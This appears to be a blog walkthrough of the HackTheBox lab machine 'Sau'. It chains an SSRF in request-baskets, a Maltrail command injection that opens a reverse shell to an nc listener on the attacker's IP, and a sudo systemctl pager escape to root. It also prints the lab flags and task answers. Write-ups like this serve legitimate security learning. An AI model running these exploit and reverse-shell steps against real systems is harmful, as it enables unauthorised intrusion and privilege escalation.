niccolò@home:~$

Archive

About

RSS

HackTheBox - Sau

HackTheBox - Sau

Field Details
OS Linux
Difficulty Easy
Release Date 2023-07-08
Pwned Date 2026-04-25
Tags Shell Escape Sudo Misconfiguration Unauthenticated OS Command Injection Server-Side Request Forgery

Summary

Sau is an Easy Difficulty Linux machine that hosts a Request Baskets instance. This instance is vulnerable to Server-Side Request Forgery (SSRF) via CVE-2023-27163. Leveraging the vulnerability we are to gain access to a Maltrail instance that is vulnerable to Unauthenticated OS Command Injection, which allows us to gain a reverse shell on the machine as unprivileged user. A sudo misconfiguration is then exploited to gain a root shell.

Reconnaissance

Port Scan

Starting with a general scan of all TCP ports

nmap -p- --min-rate 5000 -oN all_tcp_ports.txt 10.129.26.47

PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown

Task 1: Which is the highest open TCP port on the target machine? 55555

Continuing with a more thourough scan of detected ports

nmap -sC -sV -p 22,80,8338,55555 -oN service_scan.txt 10.129.26.47
  • -sC : run default scripts
  • -sV : service version detection
[snip]
55555/tcp open     http    Golang net/http server
| http-title: Request Baskets

Request baskets is a open source tool written in Go designed to catch and inspect HTTP requests.

Unfortunately nmap failed to identify the version of the service but browsing to http://10.129.26.47:55555 and inspecting the page version info can be found in the footer:

Powered by request-baskets | Version: 1.2.1

Task 2: What is the name of the open source software that the application on 55555 is “powered by”? request-baskets

Searching for known vulnerabilities a Server-Side Request Forgery vuln (CVE-2023-27163) can be found. Here’s a proof of concept at https://packetstorm.news/files/id/174128

Task 3: What is the version of request-baskets running on Sau? 1.2.1

Task 4: What is the 2023 CVE ID for a Server-Side Request Forgery (SSRF) in this version of request-baskets? CVE-2023-27163

Foothold

Exploit SSRF to expose filtered ports

Using packetstorm’s PoC

./exploit.sh <URL> <TARGET>
  • is the url of the vulnerable service
  • is the url we want to access via request forgery

The script allow to create baskets that can relay requests to the filtered ports detected earlier via nmap, making them accessible.

./exploit.sh http://10.129.26.47:55555 http://127.0.0.1:80

Creating the "mtfbhg" proxy basket...
Basket created!
Accessing http://10.129.26.47:55555/mtfbhg now makes the server request to [http://127.0.0.1:80](http://127.0.0.1/).
Response body (Authorization): {"token":"vthfCj1VuNagiIDj0FbVkhFWDDDL7CM0SyoqyjUGFEIC"}

Browsing to the created basket allow access to the service running on port 80 which is a Maltrail service v0.53. Maltrail is an open-source malicious traffic detection system.

Running the script against port 8338 has a similar result, there is a maltrail service on that port too.

Task 5: What is the name of the software that the application running on port 80 is “powered by”? Maltrail

Exploit command injection vulnerability to get reverse shell

Searching for known Maltrail vulnerabilities: https://github.com/spookier/Maltrail-v0.53-Exploit/blob/main/exploit.py

The Maltrail v0.53 suffers from a command injection vulnerability, on the /login endpoint. The exploit uses this to establish a reverse shell.

Task 6: There is an unauthenticated command injection vulnerability in MailTrail v0.53. What is the relative path on the webserver targeted by this exploit? /login

Listening on the attacking machine for incoming connections

nc -lvnp 4444

Running maltrail exploit

python maltrail_exploit.py 10.10.14.50 4444 http://10.129.26.47:55555/mtfbhg
  • 10.10.14.50: attacker’s ip
  • 4444: port where the attacker is listening
  • http://10.129.26.47:55555/mtfbhg: url to basket that allow access to maltrail

A connection is received on the listening port

connect to [10.10.14.50] from (UNKNOWN) [10.129.26.47] 45842

$ whoami

puma

A reverse shell is established and it allows access to the user ‘puma’.

Task 7: What system user is the Mailtrack application running as on Sau? puma

cat /home/puma/user.txt

USER FLAG: 233eeab040d7ce6026f98acdebfadbf9

Privilege Escalation

Enumeration

Checking sudo permissions

sudo -l

[snip]
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

User puma can run the /usr/bin/systemctl status trail.service command with sudo.

Escalation via pager

If the output of a command does not fit the terminal screen, Linux uses a pager (such as ‘less’) to allow scrolling. If the command is being run with sudo the pager inherits root permissions.

Shrinking terminal window to be very small so that the output won’t fit and then running

sudo /usr/bin/systemctl status trail.service

[snip]
Apr 24 14:07:19 sau systemd[1]: Started Maltrail. Server of malicious traffic d>
Apr 25 11:44:42 sau maltrail[2844]: Failed password for None from 127.0.0.1 por>
Apr 25 13:59:38 sau sudo[2987]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=ro>
Apr 25 14:02:47 sau sudo[2989]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=ro>
lines 1-23

Typing !/bin/sh should spawn a root shell. The ‘!’ tells the pager program to execute a shell command.

Task 9: What is the full path to the binary (without arguments) the puma user can run as root on Sau? /usr/bin/systemctl

systemctl --version

systemd 245 (245.4-4ubuntu3.22)

Task 10: What is the full version string for the instance of systemd installed on Sau? systemd 245 (245.4-4ubuntu3.22)

Task 11: What is the 2023 CVE ID for a local privilege escalation vulnerability in this version of systemd? CVE-2023-26604

cat /root/root.txt

ROOT FLAG: bf908f89925be1fa26abb2c1a6175675